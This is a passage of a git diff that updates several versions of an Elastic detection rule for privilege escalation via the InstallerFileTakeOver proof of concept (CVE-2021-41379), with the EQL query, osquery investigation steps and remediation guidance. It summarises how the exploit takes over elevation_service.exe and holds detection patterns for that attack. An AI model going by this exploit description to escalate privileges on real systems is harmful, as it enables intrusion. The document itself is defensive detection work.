identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n", "references": [ "https://github.com/klinix5/InstallerFileTakeOver" @@ -67,7 +67,7 @@ ], "risk_score": 73, "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_107.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_107.json index 8dd9e458420..9dae2739cde 100644 --- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_107.json +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via InstallerFileTakeOver", - "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n", "references": [ "https://github.com/klinix5/InstallerFileTakeOver" @@ -67,7 +67,7 @@ ], "risk_score": 73, "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_108.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_108.json index e443085cf07..9c57a982b3b 100644 --- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_108.json +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_108.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via InstallerFileTakeOver", - "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name : \"System\" and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n \n (process.name : \"elevation_service.exe\" and\n not process.code_signature.trusted == true) or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n ) and\n not\n (\n process.name : \"elevation_service.exe\" and process.code_signature.trusted == true and\n process.pe.original_file_name == null\n )\n", "references": [ "https://github.com/klinix5/InstallerFileTakeOver" @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_109.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_109.json index e67490e90d9..0c6461ce313 100644 --- a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_109.json +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_109.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via InstallerFileTakeOver", - "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in 